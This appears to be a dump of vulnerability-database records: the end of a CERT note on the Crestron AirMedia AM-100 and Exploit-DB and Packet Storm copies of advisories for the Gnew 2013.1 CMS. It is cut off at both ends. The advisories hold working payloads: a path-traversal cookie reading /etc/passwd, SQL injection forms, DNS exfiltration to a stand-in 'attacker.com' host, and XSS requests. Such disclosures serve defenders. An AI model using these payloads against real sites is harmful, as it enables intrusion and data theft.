two](<https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-002.md>).[](<https://github.com/CylanceVulnResearch/disclosures/CLVA-2016-05-001.md>)[](<https://github.com/CylanceVulnResearch/disclosures/CLVA-2016-05-002.md>) \n \n--- \n \n### Impact \n\nAn unauthenticated remote user may be able to access arbitrary files from the device filesystem, or execute arbitrary OS commands on the device. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nCrestron has released [firmware version 1.4.0.13](<http://www.crestron.com/products/model/AM-100>) to address these issues. Affected users should update the firmware of their AM-100 as soon as possible. \n \n--- \n \n### Vendor Information\n\n603047\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Crestron Electronics\n\nUpdated: July 19, 2016 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10.0 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 8.3 | E:F/RL:OF/RC:C \nEnvironmental | 6.2 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://www.crestron.com/products/model/AM-100>\n * <https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-001.md>\n * <https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-002.md>\n * <http://cwe.mitre.org/data/definitions/22.html>\n * <http://cwe.mitre.org/data/definitions/77.html>\n\n### Acknowledgements\n\nThanks to Zach Lanier of Cylance, Inc., for reporting this vulnerability.\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2016-5639, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5639>) [CVE-2016-5640](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5640>) \n---|--- \n**Date Public:** | 2016-08-01 \n**Date First Published:** | 2016-08-01 \n**Date Last Updated: ** | 2016-08-02 15:15 UTC \n**Document Revision: ** | 22 \n", "modified": "2016-08-02T15:15:00", "published": "2016-08-01T00:00:00", "id": "VU:603047", "href": "https://www.kb.cert.org/vuls/id/603047", "type": "cert", "title": "Crestron AirMedia AM-100 contains multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-03T08:42:03", "bulletinFamily": "exploit", "description": "Gnew 2013.1 - Multiple Vulnerabilities. CVE-2013-5639,CVE-2013-5640,CVE-2013-7349. Webapps exploit for php platform", "modified": "2013-10-02T00:00:00", "published": "2013-10-02T00:00:00", "id": "EDB-ID:28684", "href": "https://www.exploit-db.com/exploits/28684/", "type": "exploitdb", "title": "Gnew 2013.1 - Multiple Vulnerabilities", "sourceData": "Advisory ID: HTB23171\r\nProduct: Gnew\r\nVendor: Raoul Proen\u00c3\u00a7a\r\nVulnerable Version(s): 2013.1 and probably prior\r\nTested Version: 2013.1\r\nAdvisory Publication: August 28, 2013 [without technical details]\r\nVendor Notification: August 28, 2013\r\nPublic Disclosure: October 2, 2013\r\nVulnerability Type: PHP File Inclusion [CWE-98], SQL Injection [CWE-89]\r\nCVE References: CVE-2013-5639, CVE-2013-5640\r\nRisk Level: High\r\nCVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\nSolution Status: Solution Available\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Gnew, which can be exploited to execute arbitrary PHP code and pefrom SQL injection attacks against vulnerable application.\r\n\r\n1) PHP File Inclusion in Gnew: CVE-2013-5639\r\n\r\nVulnerability exists due to insufficient validation of user-supplied input passed via the \"gnew_language\" cookie to \"/users/login.php\" script before using it in \"include()\" function. A remote attacker can include and execute arbitrary local files on a vulnerable system via directory traversal sequence and URL-encoded NULL byte.\r\n\r\nThe following exploitation example below displays content of the \"/etc/passwd\" file:\r\n\r\nGET /users/login.php HTTP/1.1\r\nCookie: gnew_language=../../../etc/passwd%00;\r\n\r\n2) SQL Injection in Gnew: CVE-2013-5640\r\n\r\n2.1 The vulnerability exists due to insufficient filtration of \"friend_email\" HTTP POST parameter passed to \"/news/send.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe following exploitation example sends MySQL server version and database username to email address \"attacker (at) mail (dot) com [email concealed]\":\r\n\r\n<form action=\"http://[host]/news/send.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"send\" value=\"1\">\r\n<input type=\"hidden\" name=\"user_name\" value=\"username\">\r\n<input type=\"hidden\" name=\"user_email\" value=\"user (at) mail (dot) com [email concealed]\">\r\n<input type=\"hidden\" name=\"friend_email\" value=\"attacker (at) mail (dot) com [email concealed]\">\r\n<input type=\"hidden\" name=\"news_id\" value=\"-1' UNION SELECT version(),user() -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n2.2 The vulnerability exists due to insufficient filtration of \"user_email\" HTTP POST parameter passed to \"/users/register.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe exploitation example below outputs database username and MySQL server version into file \"/var/www/file.txt\". Successful exploitation requires that MySQL server has write access to the \"/var/www\" directory.\r\n\r\n<form action=\"http://[host]/users/register.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"register\" value=\"1\">\r\n<input type=\"hidden\" name=\"user_email\" value=\"' UNION SELECT user(),version() INTO OUTFILE '/var/www/file.txt' -- 2\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n2.3 The vulnerability exists due to insufficient filtration of \"answer_id\" HTTP POST parameter passed to \"/polls/vote.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\n<form action=\"http://[host]/polls/vote.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"add_vote\" value=\"1\">\r\n<input type=\"hidden\" name=\"answer_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"hidden\" name=\"question_id\" value=\"1\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n2.4 The vulnerability exists due to insufficient filtration of \"question_id\" HTTP POST parameter passed to \"/polls/vote.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\n<form action=\"http://[host]/polls/vote.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"add_vote\" value=\"1\">\r\n<input type=\"hidden\" name=\"answer_id\" value=\"1\">\r\n<input type=\"hidden\" name=\"question_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n2.5 The vulnerability exists due to insufficient filtration of \"story_id\" HTTP POST parameter passed to \"/comments/add.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\n<form action=\"http://[host]/comments/add.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"add\" value=\"1\">\r\n<input type=\"hidden\" name=\"preview\" value=\"1\">\r\n<input type=\"hidden\" name=\"comment_subject\" value=\"1\">\r\n<input type=\"hidden\" name=\"comment_text\" value=\"1\">\r\n<input type=\"hidden\" name=\"story_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n2.6 The vulnerability exists due to insufficient filtration of \"story_id\" HTTP POST parameter passed to \"/comments/edit.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\n<form action=\"http://[host]/comments/edit.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"edit\" value=\"1\">\r\n<input type=\"hidden\" name=\"preview_edited\" value=\"1\">\r\n<input type=\"hidden\" name=\"comment_subject\" value=\"1\">\r\n<input type=\"hidden\" name=\"comment_text\" value=\"1\">\r\n<input type=\"hidden\" name=\"story_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n2.7 The vulnerability exists due to insufficient filtration of \"thread_id\" HTTP POST parameter passed to \"/posts/add.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\n<form action=\"http://[host]/posts/add.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"add\" value=\"1\">\r\n<input type=\"hidden\" name=\"preview\" value=\"1\">\r\n<input type=\"hidden\" name=\"thread_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n2.8 The vulnerability exists due to insufficient filtration of \"thread_id\" HTTP POST parameter passed to \"/posts/edit.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\n<form action=\"http://[host]/posts/edit.php\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"edit\" value=\"1\">\r\n<input type=\"hidden\" name=\"preview_edited\" value=\"1\">\r\n<input type=\"hidden\" name=\"thread_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(\r\n107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),\r\nCHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\nSuccessful exploitation of vulnerabilities 2.3-2.8 requires that attacker is registered and logged-in. Registration is opened by default.\r\n\r\nVulnerabilities 2.1, 2.2 and 2.8 were discovered by Gjoko Krstic: http://packetstormsecurity.com/files/122771 on July 23, 2013. High-Tech Bridge Research Lab has discovered these vulnerabilities independently and publishes them as since the Vendor notification date they remain unpatched.\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nSolution:\r\n\r\nVendor did not reply to 6 notifications by email. Currently we are not aware of any official solution for these vulnerabilities.\r\n\r\nUnofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23171-patch.zip\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23171 - https://www.htbridge.com/advisory/HTB23171 - Multiple vulnerabilities in Gnew.\r\n[2] Gnew - http://www.gnew.fr - Gnew is a simple and open-source Content Management System.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00c2\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00c2\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28684/"}, {"lastseen": "2016-02-03T06:07:55", "bulletinFamily": "exploit", "description": "Gnew 2013.1 - Multiple Vulnerabilities. CVE-2013-5640,CVE-2013-7349,CVE-2013-7368. Webapps exploit for php platform", "modified": "2013-08-12T00:00:00", "published": "2013-08-12T00:00:00", "id": "EDB-ID:27522", "href": "https://www.exploit-db.com/exploits/27522/", "type": "exploitdb", "title": "Gnew 2013.1 - Multiple Vulnerabilities", "sourceData": "\r\nGnew v2013.1 Multiple XSS And SQL Injection Vulnerabilities\r\n\r\n\r\nVendor: Raoul Proen\u00e7a\r\nProduct web page: http://www.gnew.fr\r\nAffected version: 2013.1\r\n\r\nSummary: Gnew is a simple Content Management\r\nSystem written with PHP language and using a\r\ndatabase server (MySQL, PostgreSQL or SQLite)\r\nfor storage.\r\n\r\nDesc: Input passed via several parameters is not properly\r\nsanitised before being returned to the user or used in SQL\r\nqueries. This can be exploited to manipulate SQL queries\r\nby injecting arbitrary SQL code and HTML/script code in a\r\nuser's browser session in context of an affected site.\r\n\r\n\r\n============================================================================================\r\n| PARAM | TYPE | FILE |\r\n============================================================================================\r\n| |\r\n| gnew_template | XSS | /users/profile.php, /articles/index.php, /admin/polls.php |\r\n|------------------------------------------------------------------------------------------|\r\n| category_id | XSS | /news/submit.php |\r\n|------------------------------------------------------------------------------------------|\r\n| news_id | XSS, SQLi | /news/send.php, /comments/add.php |\r\n|------------------------------------------------------------------------------------------|\r\n| post_subject | XSS | /posts/edit.php |\r\n|------------------------------------------------------------------------------------------|\r\n| thread_id | XSS, SQLi | /posts/edit.php |\r\n|------------------------------------------------------------------------------------------|\r\n| user_email | SQLi | /users/register.php, /users/password.php |\r\n| |\r\n============================================================================================\r\n\r\n\r\n\r\nTested on: Microsoft Windows 7 Ultimate SP1 (EN)\r\n Apache 2.4.2 (Win32)\r\n PHP 5.4.7\r\n MySQL 5.5.25a\r\n\r\n\r\nVulnerabilities discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\n\r\nAdvisory ID: ZSL-2013-5153\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5153.php\r\n\r\n\r\n\r\n23.07.2013\r\n\r\n---\r\n\r\n\r\n#1 [xss]\r\n\r\nGET /gnew/users/profile.php HTTP/1.1\r\nHost: localhost\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/gnew/admin/index.php\r\nCookie: PHPSESSID=8nta354i78d5att3l2gkh9g573; gnew_date_format=D%2C+M+jS+Y%2C+g%3Ai+a; gnew_date_offset=0; gnew_language=english; gnew_template=clean\"><script>alert(1)</script>\r\nConnection: keep-alive\r\n\r\n\r\n#2 [xss]\r\n\r\nPOST /gnew/news/submit.php HTTP/1.1\r\nContent-Length: 112\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: http://localhost:80/gnew/\r\nHost: localhost\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\n\r\ncategory_id=1\"><script>alert(2);</script>&news_source=1&news_subject=1&news_text=1&preview=Preview&submit=Submit\r\n\r\n\r\n#3 [xss]\r\n\r\nPOST /gnew/news/send.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: http://localhost:80/gnew/\r\nHost: localhost\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\n\r\nfriend_email=lab@zeroscience.mk&html_email=1&news_id=572\"><script>alert(3);</script>&send=Send&user_email=root@att.com&user_name=admin\r\n\r\n\r\n#4 [xss]\r\n\r\nPOST /gnew/comments/add.php HTTP/1.1\r\nContent-Length: 96\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: http://localhost:80/gnew/\r\nHost: localhost\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\n\r\nadd=Add&comment_subject=1&comment_text=1&news_id=574\"><script>alert(4);</script>&preview=Preview\r\n\r\n\r\n#5 [sqli]\r\n\r\nPOST /gnew/news/send.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: http://localhost:80/gnew/\r\nHost: localhost\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\n\r\nfriend_email=lab@zeroscience.mk&html_email=1&news_id=572{SQL Injection}&send=Send&user_email=root@att.com&user_name=admin\r\n\r\n\r\n#6 [xss]\r\n\r\nPOST /gnew/posts/edit.php HTTP/1.1\r\nContent-Length: 153\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: http://localhost:80/gnew/\r\nHost: localhost\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\n\r\ncategory_id=1&edit=Edit&post_creation=1374594465&post_id=6&post_subject=zsl\"><script>alert(5);</script>&post_text=test&preview_edited=Preview&thread_id=6\r\n\r\n\r\n#7 [xss]\r\n\r\nPOST /gnew/posts/edit.php HTTP/1.1\r\nContent-Length: 184\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: http://localhost:80/gnew/\r\nHost: localhost\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\n\r\ncategory_id=1&edit=Edit&post_creation=1374594465&post_id=6&post_subject=test&post_text=test&preview_edited=Preview&thread_id=6\"><script>alert(6);</script>\r\n\r\n\r\n#8 [sqli]\r\n\r\nPOST /gnew/posts/edit.php HTTP/1.1\r\nHost: localhost\r\nContent-Length: 127\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: http://localhost:80/gnew/\r\nHost: localhost\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\n\r\ncategory_id=1&edit=Edit&post_creation=1374594465&post_id=6&post_subject=test&post_text=test&preview_edited=Preview&thread_id=6{SQL Injection}\r\n\r\n\r\n#9 [sqli]\r\n\r\nPOST /gnew/users/password.php HTTP/1.1\r\nHost: localhost\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/gnew/users/password.php\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 40\r\n\r\nuser_name=test&user_email={SQL Injection}&password=Send\r\n\r\n\r\n#10 [sqli]\r\n\r\nPOST /gnew/users/register.php HTTP/1.1\r\nHost: localhost\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/gnew/users/password.php\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 40\r\n\r\nuser_name=test&user_email={SQL Injection}&password=Send\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/27522/"}], "packetstorm": [{"lastseen": "2016-12-05T22:18:50", "bulletinFamily": "exploit", "description": "", "modified": "2013-10-02T00:00:00", "published": "2013-10-02T00:00:00", "href": "https://packetstormsecurity.com/files/123482/Gnew-2013.1-PHP-File-Inclusion-SQL-Injection.html", "id": "PACKETSTORM:123482", "type": "packetstorm", "title": "Gnew 2013.1 PHP File Inclusion / SQL Injection", "sourceData": "`Advisory ID: HTB23171 \nProduct: Gnew \nVendor: Raoul Proen\u00e7a \nVulnerable Version(s): 2013.1 and probably prior \nTested Version: 2013.1 \nAdvisory Publication: August 28, 2013 [without technical details] \nVendor Notification: August 28, 2013 \nPublic Disclosure: October 2, 2013 \nVulnerability Type: PHP File Inclusion [CWE-98], SQL Injection [CWE-89] \nCVE References: CVE-2013-5639, CVE-2013-5640 \nRisk Level: High \nCVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) \nSolution Status: Solution Available \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Gnew, which can be exploited to execute arbitrary PHP code and pefrom SQL injection attacks against vulnerable application. \n \n \n1) PHP File Inclusion in Gnew: CVE-2013-5639 \n \nVulnerability exists due to insufficient validation of user-supplied input passed via the \"gnew_language\" cookie to \"/users/login.php\" script before using it in \"include()\" function. A remote attacker can include and execute arbitrary local files on a vulnerable system via directory traversal sequence and URL-encoded NULL byte. \n \nThe following exploitation example below displays content of the \"/etc/passwd\" file: \n \n \nGET /users/login.php HTTP/1.1 \nCookie: gnew_language=../../../etc/passwd%00; \n \n \n \n2) SQL Injection in Gnew: CVE-2013-5640 \n \n2.1 The vulnerability exists due to insufficient filtration of \"friend_email\" HTTP POST parameter passed to \"/news/send.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \n \nThe following exploitation example sends MySQL server version and database username to email address \"attacker@mail.com\": \n \n \n<form action=\"http://[host]/news/send.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"send\" value=\"1\"> \n<input type=\"hidden\" name=\"user_name\" value=\"username\"> \n<input type=\"hidden\" name=\"user_email\" value=\"user@mail.com\"> \n<input type=\"hidden\" name=\"friend_email\" value=\"attacker@mail.com\"> \n<input type=\"hidden\" name=\"news_id\" value=\"-1' UNION SELECT version(),user() -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n \n2.2 The vulnerability exists due to insufficient filtration of \"user_email\" HTTP POST parameter passed to \"/users/register.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \n \nThe exploitation example below outputs database username and MySQL server version into file \"/var/www/file.txt\". Successful exploitation requires that MySQL server has write access to the \"/var/www\" directory. \n \n \n<form action=\"http://[host]/users/register.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"register\" value=\"1\"> \n<input type=\"hidden\" name=\"user_email\" value=\"' UNION SELECT user(),version() INTO OUTFILE '/var/www/file.txt' -- 2\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n \n2.3 The vulnerability exists due to insufficient filtration of \"answer_id\" HTTP POST parameter passed to \"/polls/vote.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database. \n \nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \n \n<form action=\"http://[host]/polls/vote.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"add_vote\" value=\"1\"> \n<input type=\"hidden\" name=\"answer_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"hidden\" name=\"question_id\" value=\"1\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n \n2.4 The vulnerability exists due to insufficient filtration of \"question_id\" HTTP POST parameter passed to \"/polls/vote.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database. \n \nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \n \n<form action=\"http://[host]/polls/vote.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"add_vote\" value=\"1\"> \n<input type=\"hidden\" name=\"answer_id\" value=\"1\"> \n<input type=\"hidden\" name=\"question_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n \n2.5 The vulnerability exists due to insufficient filtration of \"story_id\" HTTP POST parameter passed to \"/comments/add.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database. \n \nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \n \n<form action=\"http://[host]/comments/add.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"add\" value=\"1\"> \n<input type=\"hidden\" name=\"preview\" value=\"1\"> \n<input type=\"hidden\" name=\"comment_subject\" value=\"1\"> \n<input type=\"hidden\" name=\"comment_text\" value=\"1\"> \n<input type=\"hidden\" name=\"story_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n \n2.6 The vulnerability exists due to insufficient filtration of \"story_id\" HTTP POST parameter passed to \"/comments/edit.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database. \n \nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \n \n<form action=\"http://[host]/comments/edit.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"edit\" value=\"1\"> \n<input type=\"hidden\" name=\"preview_edited\" value=\"1\"> \n<input type=\"hidden\" name=\"comment_subject\" value=\"1\"> \n<input type=\"hidden\" name=\"comment_text\" value=\"1\"> \n<input type=\"hidden\" name=\"story_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select 